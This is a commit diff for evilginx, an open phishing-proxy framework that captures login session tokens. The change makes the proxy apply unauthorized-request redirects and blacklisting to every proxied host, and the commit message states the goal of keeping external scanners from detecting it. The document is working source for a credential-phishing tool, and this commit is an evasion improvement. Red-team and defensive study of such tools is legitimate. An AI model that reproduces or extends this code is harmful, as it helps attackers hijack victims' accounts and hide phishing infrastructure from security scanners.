fixed: unauthorized requests now properly handled for proxy_hosts w…

…ithout `session` set to `true`, preventing proxy detection by scanners
kgretzky · Feb 28, 2024 · d8f7d44 · d8f7d44 · Konami2022 · Feb 28, 2024
1 parent e1f3b83
commit d8f7d44
Show file tree

Hide file tree

Showing 3 changed files with 24 additions and 31 deletions.
diff --git a/CHANGELOG b/CHANGELOG
@@ -1,6 +1,7 @@
 # Unreleased
 - Fixed: Added support for exported cookies with names prefixed with `__Host-` and `__Secure-`.
 - Fixed: Global `unauth_url` can now be set to an empty string to have the server return `403` on unauthorized requests.
+- Fixed: Unauthorized redirects and blacklisting would be ignored for `proxy_hosts` with `session: false` (default) making it easy to detect evilginx by external scanners.
 
 # 3.2.0
 - Feature: URL redirects on successful token capture now work dynamically on every phishing page. Pages do not need to reload or redirect first for the redirects to happen.

diff --git a/core/config.go b/core/config.go
@@ -576,17 +576,15 @@ func (c *Config) VerifyPhishlets() {
 			continue
 		}
 		for _, ph := range pl.proxyHosts {
-			if ph.is_landing || ph.handle_session {
-				phish_host := combineHost(ph.phish_subdomain, ph.domain)
-				orig_host := combineHost(ph.orig_subdomain, ph.domain)
-				if c_site, ok := hosts[phish_host]; ok {
-					log.Warning("phishlets: hostname '%s' collision between '%s' and '%s' phishlets", phish_host, site, c_site)
-				} else if c_site, ok := hosts[orig_host]; ok {
-					log.Warning("phishlets: hostname '%s' collision between '%s' and '%s' phishlets", orig_host, site, c_site)
-				}
-				hosts[phish_host] = site
-				hosts[orig_host] = site
+			phish_host := combineHost(ph.phish_subdomain, ph.domain)
+			orig_host := combineHost(ph.orig_subdomain, ph.domain)
+			if c_site, ok := hosts[phish_host]; ok {
+				log.Warning("phishlets: hostname '%s' collision between '%s' and '%s' phishlets", phish_host, site, c_site)
+			} else if c_site, ok := hosts[orig_host]; ok {
+				log.Warning("phishlets: hostname '%s' collision between '%s' and '%s' phishlets", orig_host, site, c_site)
 			}
+			hosts[phish_host] = site
+			hosts[orig_host] = site
 		}
 	}
 }

diff --git a/core/http_proxy.go b/core/http_proxy.go
@@ -226,11 +226,12 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 						session_id = session_id[:len(session_id)-3]
 						if s, ok := p.sessions[session_id]; ok {
 							var d_body string
-
-							if s.RedirectURL != "" {
-								dynamic_redirect_js := DYNAMIC_REDIRECT_JS
-								dynamic_redirect_js = strings.ReplaceAll(dynamic_redirect_js, "{session_id}", s.Id)
-								d_body += dynamic_redirect_js + "\n\n"
+							if !s.IsDone {
+								if s.RedirectURL != "" {
+									dynamic_redirect_js := DYNAMIC_REDIRECT_JS
+									dynamic_redirect_js = strings.ReplaceAll(dynamic_redirect_js, "{session_id}", s.Id)
+									d_body += dynamic_redirect_js + "\n\n"
+								}
 							}
 							resp := goproxy.NewResponse(req, "application/javascript", 200, string(d_body))
 							return req, resp
@@ -292,8 +293,6 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 							log.Error("[%s] wrong session token: %s (%s) [%s]", hiblue.Sprint(pl_name), req_url, req.Header.Get("User-Agent"), remote_addr)
 						}
 					} else {
-						log.Warning("session cookie not found: %s (%s) [%s]", req_url, remote_addr, pl.Name)
-
 						if l == nil && p.isWhitelistedIP(remote_addr, pl.Name) {
 							// not a lure path and IP is whitelisted
 
@@ -360,17 +359,15 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 										log.Error("database: %v", err)
 									}
 
-									if l != nil {
-										session.RedirectURL = pl.RedirectUrl
-										if l.RedirectUrl != "" {
-											session.RedirectURL = l.RedirectUrl
-										}
-										if session.RedirectURL != "" {
-											session.RedirectURL, _ = p.replaceUrlWithPhished(session.RedirectURL)
-										}
-										session.PhishLure = l
-										log.Debug("redirect URL (lure): %s", session.RedirectURL)
+									session.RedirectURL = pl.RedirectUrl
+									if l.RedirectUrl != "" {
+										session.RedirectURL = l.RedirectUrl
+									}
+									if session.RedirectURL != "" {
+										session.RedirectURL, _ = p.replaceUrlWithPhished(session.RedirectURL)
 									}
+									session.PhishLure = l
+									log.Debug("redirect URL (lure): %s", session.RedirectURL)
 
 									// set params from url arguments
 									p.extractParams(session, req.URL)
@@ -1684,10 +1681,7 @@ func (p *HttpProxy) handleSession(hostname string) bool {
 			}
 			for _, ph := range pl.proxyHosts {
 				if hostname == combineHost(ph.phish_subdomain, phishDomain) {
-					if ph.handle_session || ph.is_landing {
-						return true
-					}
-					return false
+					return true
 				}
 			}
 		}